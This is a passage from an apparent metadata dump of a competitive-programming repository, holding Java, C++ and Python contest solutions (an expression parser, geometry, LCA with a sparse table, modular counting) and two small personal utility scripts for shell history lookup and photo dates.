acc;\n\t\t\treturn 
x;\n\t\tdefault:\n\t\t\tthrow new ParseException(\"unexpected \" + (char) lex.prevChar, lex.curPos);\n\t\t}\n\t}\n\n\tTree T(String acc) throws ParseException {\n\t\twriteln(acc + \" \" + \"T\");\n\t\tswitch (lex.curToken()) {\n\t\tcase NUMBER:\n\t\tcase X:\n\t\tcase LPAREN:\n\t\t\tTree temp = F(acc);\n\t\t\tTree y = S(temp.v);\n\t\t\tTree x = new Tree(\"T\", temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tdefault:\n\t\t\tthrow new ParseException(\"expected NUMBER or '(', got \" + (char) lex.prevChar, lex.curPos);\n\t\t}\n\t}\n\n\tTree S(String acc) throws ParseException {\n\t\twriteln(acc + \" \" + \"S\");\n\t\tswitch (lex.curToken()) {\n\t\tcase TIMES:\n\t\t\tlex.nextToken();\n\t\t\tTree temp = F(acc);\n\t\t\tTree y = S(Tree.eval(\"*\", acc, temp.v));\n\t\t\tTree x = new Tree(\"S\", new Tree(\"*\"), temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tcase DIVIDE:\n\t\t\tlex.nextToken();\n\t\t\ttemp = F(acc);\n\t\t\ty = S(Tree.eval(\"/\", acc, temp.v));\n\t\t\tx = new Tree(\"S\", new Tree(\"/\"), temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tcase RPAREN:\n\t\tcase MINUS:\n\t\tcase PLUS:\n\t\tcase END:\n\t\t\tx = new Tree(\"S\");\n\t\t\tx.v = acc;\n\t\t\treturn x;\n\t\tdefault:\n\t\t\tthrow new ParseException(\"unexpected \" + (char) lex.prevChar, lex.curPos);\n\t\t}\n\t}\n\n\tTree F(String acc) throws ParseException {\n\t\twriteln(acc + \" \" + \"F\");\n\t\tswitch (lex.curToken()) {\n\t\tcase NUMBER:\n\t\tcase X:\n\t\tcase LPAREN:\n\t\t\tTree temp = G(acc);\n\t\t\tTree y = H(temp.v);\n\t\t\tTree x = new Tree(\"F\", temp, y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tdefault:\n\t\t\tthrow new ParseException(\"expected , got \" + (char) lex.prevChar, lex.curPos);\n\t\t}\n\t}\n\n\tTree H(String acc) throws ParseException {\n\t\twriteln(acc + \" \" + \"H\");\n\t\tswitch (lex.curToken()) {\n\t\tcase CIRCONFLEXE:\n\t\t\tlex.nextToken();\n\t\t\tTree temp = G(acc);\n\t\t\tTree y = H(temp.v);\n\t\t\tTree x = new Tree(\"H\", new Tree(\"^\"), temp, y);\n\t\t\tx.v = 
Tree.eval(\"^\", acc, y.v);\n\t\t\treturn x;\n\n\t\tcase RPAREN:\n\t\tcase TIMES:\n\t\tcase DIVIDE:\n\t\tcase MINUS:\n\t\tcase PLUS:\n\t\tcase END:\n\t\t\tx = new Tree(\"H\");\n\t\t\tx.v = acc;\n\t\t\treturn x;\n\t\tdefault:\n\t\t\tthrow new ParseException(\"unexpected \" + (char) lex.prevChar, lex.curPos);\n\t\t}\n\t}\n\n\tTree G(String acc) throws ParseException {\n\t\twriteln(acc + \" \" + \"G\");\n\t\tdouble c = lex.prevChar;\n\t\tswitch (lex.curToken()) {\n\t\tcase NUMBER:\n\t\t\tlex.nextToken();\n\t\t\tTree y = new Tree(c);\n\t\t\tTree x = new Tree(\"G\", y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tcase X:\n\t\t\tlex.nextToken();\n\t\t\tif (ok)\n\t\t\t\ty = new Tree(X);\n\t\t\telse\n\t\t\t\ty = new Tree(\"x\");\n\t\t\tx = new Tree(\"G\", y);\n\t\t\tx.v = y.v;\n\t\t\treturn x;\n\t\tcase LPAREN:\n\t\t\tlex.nextToken();\n\t\t\tTree temp = E(\"0\");\n\t\t\tif (lex.curToken() != Token.RPAREN)\n\t\t\t\tthrow new ParseException(\"unexpected \" + (char) c, lex.curPos);\n\t\t\tlex.nextToken();\n\t\t\tx = new Tree(\"G\", new Tree(\"(\"), temp, new Tree(\")\"));\n\t\t\tx.v = temp.v;\n\t\t\treturn x;\n\t\tdefault:\n\t\t\tthrow new ParseException(\"unexpected \" + (char) c, lex.curPos);\n\t\t}\n\t}\n\n\tTree parse(InputStream is) throws ParseException {\n\t\tlex = new LexicalAnalyzer(is);\n\t\tlex.nextToken();\n\t\tTree e = E(\"0\");\n\t\tif (lex.curToken != Token.END)\n\t\t\tthrow new ParseException(\"unexpected )\", lex.curPos);\n\t\treturn e;\n\t}\n}" }, { "alpha_fraction": 0.5253234505653381, "alphanum_fraction": 0.54121994972229, "avg_line_length": 34.592105865478516, "blob_id": "1070c01f27f4dd9d73927238327fddaedce28d6d", "content_id": "2764d180dcfcb66f02b064075b34e6985f4c71dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5410, "license_type": "no_license", "max_line_length": 163, "num_lines": 152, "path": "/CodeForce/0995/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, 
template version from 13 October 2017. C++17 version {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n \nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n \nvoid writeln(){cout<<\"\\n\";}ttti void print(T a);ttti void priws(T a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H h,T...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n\n//point\n#define pointtt template<typename T>\n//sorts only if z is corner point;\n#define sortByPolarAngle(v, z, T) sort(v.begin(), v.end(), [&z](point<T>& a, point<T>& b) {\\\n int q = orientation(z, a, b); return q == 0 ? 
dist(z, a) < dist(z, b) : q == -1;\\\n});\n\npointtt struct point\n{\n T x, y;\n int i;\n point(T _x, T _y) : x(_x), y(_y) {}\n point(){}\n point operator+(point b) { return point(x + b.x, y + b.y); }\n point operator-(point b) { return point(x - b.x, y - b.y); }\n point operator-() { return point(-x, -y); }\n T operator*(point b) { return x * b.x + y * b.y; }\n T operator^(point b) { return x * b.y - y * b.x; }\n T operator!() { return x * x + y * y; }\n bool operator<(point b) { return x == b.x ? y < b.y : x < b.x; }\n};\npointtt istream&operator>>(istream&is,point<T>&a){return is>>a.x>>a.y;}\npointtt ostream&operator<<(ostream&os,point<T>&a){return os<<a.x<<\" \"<<a.y;}\npointtt T dist(point<T>&a,point<T>&b){return!point<T>(a+-b);}\n//dist from point C to line AB equals to answer.first / sqrt(answer.second);\npointtt pair<T,T> dist(point<T>&a,point<T>&b,point<T>&c){return{abs((a+-b)*c)+(a^b),dist(a,b)};}\npointtt int orientation(point<T>&a,point<T>&b,point<T>&c){T q=a.x*b.y-a.y*b.x-a.x*c.y+a.y*c.x+b.x*c.y-b.y*c.x;return q>0?1:q<0?-1:0;}\n//Igorjan\n//}}}\n///-------------------------------------------------------------------------------------------------------------------------------------\n\nll inf = 1500000ll * 1500000ll;\n\nvoid run()\n{\n srand(time(NULL));\n ints(n);\n vector<point<int>> a(n);\n readln(a);\n fori(n) a[i].i = i;\n\n auto ttt = [&](vector<point<int>> a) -> optional<vi> {\n vector<int> ans(n, 1);\n point<ll> now = {0, 0};\n fori(n)\n {\n point<ll> temp1 = now;\n point<ll> temp2 = now;\n temp1.x += a[i].x;\n temp1.y += a[i].y;\n temp2.x -= a[i].x;\n temp2.y -= a[i].y;\n auto l1 = !temp1;\n auto l2 = !temp2;\n if (l2 < l1)\n now = temp2,\n ans[a[i].i] *= -1;\n else\n now = temp1;\n }\n if (!now > inf)\n return {};\n return ans;\n };\n\n for (;;)\n {\n auto temp = a;\n random_shuffle(whole(temp));\n auto ans = ttt(temp);\n if (ans.has_value())\n {\n writeln(ans.value());\n return;\n }\n }\n}\n\n//{{{\nint main()\n{\n#ifndef ONLINE_JUDGE\n double 
time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.47064340114593506, "alphanum_fraction": 0.4897767901420593, "avg_line_length": 27.05789566040039, "blob_id": "11c0277d8c25497bb9dc6f015703491d208eb223", "content_id": "8579455bcd8ac31010dd4200767f06a88f0dd383", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5331, "license_type": "no_license", "max_line_length": 174, "num_lines": 190, "path": "/2021/bioQual/3.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//sparseTable\n//0-indexed, [l, r)\ntemplate<typename T>\nstruct sparseTable\n{\n int n;\n vector<vector<T>> st;\n vector<int> logs;\n typedef function<T(const T&, const T&)> F;\n F f;\n sparseTable() {}\n\n int highestBit(int x) const { return 31 - __builtin_clz(x); }\n\n sparseTable(const vector<T>& a, F g)\n {\n n = a.size();\n f = g;\n\n logs.push_back(0);\n logs.push_back(0);\n FOR(i, 2, n + 1) logs.push_back(logs[i / 2] + 1);\n int L = logs.back() + 1;\n st.resize(L, vector<T>(n));\n fori(n)\n st[0][i] = a[i];\n FOR(k, 1, L)\n for (int i = 0; i + (1 << k) <= n; i++)\n st[k][i] = f(st[k - 1][i], st[k - 1][i + (1 << (k - 1))]);\n }\n\n T get(int l, int r)\n {\n int len = highestBit(r - l);\n return f(st[len][l], st[len][r - (1 << len)]);\n }\n};\n\n//lca\nstruct lca\n{\n vector<vector<int>> g;\n vector<int> h, tin;\n vector<pii> euler;\n int n, l;\n sparseTable<pii> st;\n\n lca(const vector<vector<int>>& g, int root = 0) //O(n * log(n))\n {\n this->g = g;\n n = SZ(g);\n h.resize(n, -1);\n tin.resize(n, -1);\n dfs(root, -1);\n st = sparseTable<pii>(euler, [](const pii& a, const pii& b) {\n if (a.first < b.first)\n return a;\n else\n return b;\n });\n }\n \n void dfs(int u, int p) //O(n)\n {\n h[u] = h[p] + 1;\n tin[u] = SZ(euler);\n euler.emplace_back(h[u], u);\n for (const int& v: g[u]) if (v != p)\n dfs(v, u),\n euler.emplace_back(h[u], u);\n }\n\n int get(int a, int b) //O(1)\n {\n if (tin[a] > tin[b]) swap(a, b);\n return st.get(tin[a], tin[b] + 1).second;\n }\n};\n\n//}}}\n\nvoid run()\n{\n ints(n);\n vi par(n - 1);\n vector<int> IC(n);\n readln(par, IC);\n IC.insert(IC.begin(), 0);\n par.insert(par.begin(), 0);\n par.insert(par.begin(), 0);\n vector<vector<int>> g(n + 1);\n FOR(i, 2, n + 1)\n g[par[i]].pb(i),\n g[i].pb(par[i]);\n lca l(g, 1);\n ints(m);\n vector<vector<int>> des(m + 1);\n fori1(m + 1)\n {\n ints(cm);\n 
des[i].resize(cm);\n readln(des[i]);\n sort(all(des[i]), [&](const int& a, const int& b) {\n return IC[a] > IC[b];\n });\n }\n ints(nq);\n forn(_, nq)\n {\n if (_ % 10 == 0) cerr << _ << \" / \" << nq << endl;\n ints(cq);\n vector<int> p(cq);\n readln(p);\n sort(all(p), [&](const int& a, const int& b) {\n return IC[a] > IC[b];\n });\n ll ans = -1;\n int index = -1;\n fori1(m + 1)\n {\n ll curAns = 0;\n for (const int& q: p)\n {\n int temp = 0;\n for (const int& d: des[i])\n if (IC[d] > temp)\n temp = max(temp, IC[l.get(q, d)]);\n curAns += temp;\n }\n if (curAns > ans)\n ans = curAns,\n index = i;\n }\n writeln(index);\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5750682353973389, "alphanum_fraction": 0.5914467573165894, "avg_line_length": 28.70270347595215, "blob_id": "406608bd497bfe0a27efe9b9862cd6dc559964ca", "content_id": "4fa064f1667f590a78e7999363b4384b14de0e60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1099, "license_type": "no_license", 
"max_line_length": 79, "num_lines": 37, "path": "/scripts/findSurname.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport sys\nimport re\nfrom pathlib import Path\nhome = Path.home()\n\nsurnames = {}\nzhistory = home.joinpath('.zhistory')\nsurnamesPath = home.joinpath('.cache').joinpath('clonerep')\nif surnamesPath.is_file():\n surnamesFile = open(surnamesPath, 'r')\n print('cache exists, reading')\nelse:\n surnamesFile = open(surnamesPath, 'w')\n print('NO')\n\n for line in open(zhistory, 'r', encoding='cp1251').readlines():\n if re.match(': \\d{10}:0;', line) != None:\n line = line.split(';', 1)[1]\n m = re.search('git clone https://github.com/(.*?)/.*? (\\w+)', line)\n if m != None:\n surnames[m.group(1)] = m.group(2)\n surnamesFile.write(m.group(1) + \" \" + m.group(2) + \"\\n\")\n\nif len(sys.argv) == 1:\n print(\"Usage: cloneRep https://gitgub.com/username/repname\")\n sys.exit()\n\nrep = sys.argv[1]\nm = re.search('https://github.com/(.*?)/', rep)\nif m != None and m.group(1) in surnames:\n surname = surnames[m.group(1)]\nelse:\n sys.stderr.write('Surname is not found!\\n')\n surname = input()\n\nprint(surname)\n" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.5336538553237915, "avg_line_length": 33.5, "blob_id": "77c424e3a4df5173b8a5be09cc08f4f3606091cf", "content_id": "670580bacb7f4cbf91d77f0d4d27a5ded298b6c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 208, "license_type": "no_license", "max_line_length": 81, "num_lines": 6, "path": "/scripts/setProperDate.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\nd=$(exiv2 -p e $1 | grep Exif.Image.DateTime | head -1 | awk {'print $4 \" \" $5'})\nd=${d/:/-}\nd=${d/:/-}\necho \"touch -d $d $1\"\nexiv2 -v -M\"set Exif.Image.DateTime \" $d 1>/dev/null 2>&1\ntouch -d \"$d +0300\" $1\n" }, { "alpha_fraction": 0.3770107328891754, "alphanum_fraction": 0.38237264752388, 
"avg_line_length": 23.875, "blob_id": "774603d59cb3b484c51a1b0d606ede7a70d6bcbd", "content_id": "97d1bf78a078ba8f1fc0ccbbed8e9c45bf2ad65a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2984, "license_type": "no_license", "max_line_length": 78, "num_lines": 120, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.25/A.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.io.*;\nimport static java.lang.Math.*;\n \npublic class A {\n FastScanner in;\n PrintWriter out;\n \n final String taskName = null;\n \n double dist(double dx, double dy) {\n return sqrt(dx * dx + dy * dy);\n }\n \n public void solve() {\n \n int n, m = 1000;\n while ((n = in.nextInt()) != 0) {\n \n double[] x = new double[n], y = new double[n];\n double l = Double.MAX_VALUE, r = Double.MIN_VALUE;\n for (int i = 0; i < n; i++) {\n x[i] = in.nextDouble();\n y[i] = in.nextDouble();\n \n l = min(l, x[i]);\n r = max(r, x[i]);\n }\n \n while (r - l > 1e-7) {\n double ll = l + (r - l) / 3;\n double rr = r - (r - l) / 3;\n \n double fl = 0, fr = 0;\n for (int i = 0; i < n; i++) {\n fl = max(fl, dist(x[i] - ll, y[i]));\n fr = max(fr, dist(x[i] - rr, y[i]));\n }\n \n if (fl < fr) {\n r = rr;\n } else {\n l = ll;\n }\n }\n \n double ans = 0, p = (r + l) / 2;\n for (int i = 0; i < n; i++) {\n ans = max(ans, dist(x[i] - p, y[i]));\n }\n \n out.println(p + \" \" + ans);\n }\n \n }\n \n public void run() {\n try {\n if (taskName == null) {\n in = new FastScanner(null);\n out = new PrintWriter(System.out);\n \n } else {\n in = new FastScanner(new File(taskName + \".in\"));\n out = new PrintWriter(new File(taskName + \".out\"));\n \n }\n \n solve();\n \n out.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n \n class FastScanner {\n BufferedReader br;\n StringTokenizer st;\n \n FastScanner(File f) {\n try {\n if (f == null) {\n br = new BufferedReader(new InputStreamReader(System.in));\n } 
else {\n br = new BufferedReader(new FileReader(f));\n }\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n }\n }\n \n long nextLong() {\n return Long.parseLong(next());\n }\n \n double nextDouble() {\n return Double.parseDouble(next());\n }\n \n String next() {\n while (st == null || !st.hasMoreTokens()) {\n try {\n st = new StringTokenizer(br.readLine());\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n return st.nextToken();\n }\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n }\n \n public static void main(String[] arg) {\n new A().run();\n }\n}" }, { "alpha_fraction": 0.395652174949646, "alphanum_fraction": 0.4108695685863495, "avg_line_length": 18.16666603088379, "blob_id": "8a6f04867b6bee64dedf9a8c5df0102f58093ad8", "content_id": "bdda7173c5a589bd837151a9336d34330714fd7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 460, "license_type": "no_license", "max_line_length": 49, "num_lines": 24, "path": "/2021/gcjQual/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "def readln():\n return list(map(int, input().split()))\n\n\ndef run():\n [n] = readln()\n a = readln()\n ans = 0\n for i in range(n - 1):\n mn = a[i]\n index = i\n for j in range(i, n):\n if a[j] < mn:\n mn = a[j]\n index = j\n ans += index - i + 1\n a[i:index + 1] = reversed(a[i:index + 1])\n\n return ans\n\n\n[t] = readln()\nfor q in range(1, t + 1):\n print(f'Case #{q}: {run()}')\n" }, { "alpha_fraction": 0.43566879630088806, "alphanum_fraction": 0.4484076499938965, "avg_line_length": 30.31999969482422, "blob_id": "7fed3f327cabec96a5c678b36fe36335695e7d47", "content_id": "618d74f54127dc9612659c59ec806b35ae93979a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 785, "license_type": "no_license", "max_line_length": 63, "num_lines": 25, "path": "/2021/vkcupMl/split.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", 
"text": "import math\nimport csv\nfrom tqdm import tqdm\n\nccc = 'train.csv'\ntest = 'testSmall.csv'\ntrain = 'trainSmall.csv'\ntestTime = 10\n\nwith open(ccc, 'r') as csvFile:\n reader = csv.DictReader(csvFile)\n with open(test, 'w') as testFile:\n with open(train, 'w') as trainFile:\n trainFile.write('u,v,t,h\\n')\n testFile.write('u,v\\n')\n for row in tqdm(reader):\n u = int(row['u'])\n v = int(row['v'])\n t = [int(row['t']), int(row['h'])]\n if t[0] < testTime:\n if u % 8 == 1 and v % 2 != 0 and u < v:\n testFile.write(f'{u},{v}\\n')\n else:\n t[0] -= testTime\n trainFile.write(f'{u},{v},{t[0]},{t[1]}\\n')\n\n\n" }, { "alpha_fraction": 0.36008939146995544, "alphanum_fraction": 0.36748024821281433, "avg_line_length": 22.761701583862305, "blob_id": "73db752e49408f851b5d47977a569858f3817891", "content_id": "1119ef386434e1b3adae01a76086591d666560a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 7774, "license_type": "no_license", "max_line_length": 89, "num_lines": 235, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.13/J.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\r\nimport java.util.Map.Entry;\r\nimport java.io.*;\r\n \r\npublic class J {\r\n    FastScanner in;\r\n    PrintWriter out;\r\n \r\n    final String inputName = null;\r\n    final String outputName = null;\r\n \r\n    class Angle {\r\n        long x, y;\r\n \r\n        public Angle(long x, long y) {\r\n            if (y < 0) {\r\n                y *= -1;\r\n                x *= -1;\r\n            }\r\n \r\n            if (y == 0) {\r\n                x = 1;\r\n            }\r\n \r\n            if (x == 0) {\r\n                y = 1;\r\n            }\r\n \r\n            long g = gcd(Math.abs(x), Math.abs(y));\r\n \r\n            this.x = x / g;\r\n            this.y = y / g;\r\n        }\r\n \r\n        @Override\r\n        public int hashCode() {\r\n            return (int) (x * 1235321 + y);\r\n  
      }\r\n \r\n        @Override\r\n        public String toString() {\r\n            return \"Angle [dx=\" + x + \", dy=\" + y + \"]\";\r\n        }\r\n \r\n        @Override\r\n        public boolean equals(Object obj) {\r\n            if (this == obj)\r\n                return true;\r\n            if (obj == null)\r\n                return false;\r\n            Angle angle = (Angle) obj;\r\n            return x == angle.x && y == angle.y;\r\n        }\r\n    }\r\n \r\n    class Line implements Comparable<Line> {\r\n        long ax, ay, bx, by;\r\n \r\n        public Line(int ax, int ay, int bx, int by) {\r\n            this.ax = ax;\r\n            this.ay = ay;\r\n            this.bx = bx;\r\n            this.by = by;\r\n        }\r\n \r\n        Angle angle() {\r\n            return new Angle(ax - bx, ay - by);\r\n        }\r\n \r\n        public int compareTo(Line v) {\r\n            Line u = this;\r\n \r\n            if (u.ax == u.bx) {\r\n                return Long.compare(u.ax, v.ax);\r\n            }\r\n \r\n            long p = (u.ax * (u.by - u.ay) + u.ay * (u.ax - u.bx)) * (v.ax - v.bx);\r\n            long q = (v.ax * (v.by - v.ay) + v.ay * (v.ax - v.bx)) * (u.ax - u.bx);\r\n \r\n            return Long.compare(p, q);\r\n        }\r\n \r\n        @Override\r\n        public String toString() {\r\n            return \"Line [ax=\" + ax + \", ay=\" + ay + \", bx=\" + bx + \", by=\" + by + \"]\";\r\n        }\r\n \r\n    }\r\n \r\n    long gcd(long a, long b) {\r\n        return b == 0 ? 
a : gcd(b, a % b);\r\n    }\r\n \r\n    public void solve() {\r\n \r\n        long mod = 1_000_000_007;\r\n        long inv = 500000004;\r\n \r\n        int n = in.nextInt();\r\n \r\n        Map<Angle, List<Line>> q = new HashMap<>(n + 23);\r\n \r\n        for (int i = 0; i < n; i++) {\r\n            Line line = new Line(in.nextInt(), in.nextInt(), in.nextInt(), in.nextInt());\r\n            Angle key = line.angle();\r\n \r\n            List<Line> list = q.get(key);\r\n \r\n            if (list == null) {\r\n                list = new ArrayList<Line>();\r\n                q.put(key, list);\r\n            }\r\n \r\n            list.add(line);\r\n        }\r\n \r\n        Map<Angle, Long> w = new HashMap<>(n + 23);\r\n \r\n        for (Entry<Angle, List<Line>> e : q.entrySet()) {\r\n            Angle angle = e.getKey();\r\n            List<Line> list = e.getValue();\r\n \r\n            // out.println(angle);\r\n            //\r\n            // for (Line line : list) {\r\n            // out.println(\"     \" + line);\r\n            // }\r\n            Collections.sort(list);\r\n            // out.println(\"sorted\");\r\n            // for (Line line : list) {\r\n            // out.println(\"     \" + line);\r\n            // }\r\n \r\n            long cnt = 0;\r\n \r\n            int m = list.size();\r\n \r\n            int l = 0;\r\n \r\n            while (l < m) {\r\n                int r = l;\r\n                while (r < m && list.get(l).compareTo(list.get(r)) == 0) {\r\n                    ++r;\r\n                }\r\n                long len = m - r;\r\n                cnt = (cnt + ((r - l) * len) % mod) % mod;\r\n                l = r;\r\n            }\r\n            w.put(angle, cnt);\r\n        }\r\n \r\n        long ans = 0;\r\n \r\n        for (Entry<Angle, Long> e : w.entrySet()) {\r\n            Angle angle = e.getKey();\r\n            long u = e.getValue();\r\n \r\n            Angle ort = new Angle(-angle.y, angle.x);\r\n \r\n            Long v = 
w.get(ort);\r\n \r\n            if (v != null) {\r\n                ans = (ans + (u * v) % mod) % mod;\r\n            }\r\n \r\n        }\r\n \r\n        out.println((ans * inv) % mod);\r\n \r\n    }\r\n \r\n    public void run() {\r\n        try {\r\n \r\n            if (inputName == null) {\r\n                in = new FastScanner(null);\r\n            } else {\r\n                in = new FastScanner(new File(inputName));\r\n            }\r\n \r\n            if (outputName == null) {\r\n                out = new PrintWriter(System.out);\r\n            } else {\r\n                out = new PrintWriter(new File(outputName));\r\n \r\n            }\r\n \r\n            solve();\r\n \r\n            out.close();\r\n        } catch (IOException e) {\r\n            e.printStackTrace();\r\n        }\r\n    }\r\n \r\n    class FastScanner {\r\n        BufferedReader br;\r\n        StringTokenizer st;\r\n \r\n        FastScanner(File f) {\r\n            try {\r\n                if (f == null) {\r\n                    br = new BufferedReader(new InputStreamReader(System.in));\r\n                } else {\r\n                    br = new BufferedReader(new FileReader(f));\r\n                }\r\n            } catch (FileNotFoundException e) {\r\n                e.printStackTrace();\r\n            }\r\n        }\r\n \r\n        long nextLong() {\r\n            return Long.parseLong(next());\r\n        }\r\n \r\n        String next() {\r\n            while (st == null || !st.hasMoreTokens()) {\r\n                try {\r\n                    st = new StringTokenizer(br.readLine());\r\n                } catch (IOException e) {\r\n                    e.printStackTrace();\r\n                }\r\n            }\r\n            return st.nextToken();\r\n        }\r\n \r\n        int nextInt() {\r\n            return Integer.parseInt(next());\r\n        }\r\n    }\r\n \r\n    public static void main(String[] arg) {\r\n        new J().run();\r\n    }\r\n}\n" }, { "alpha_fraction": 
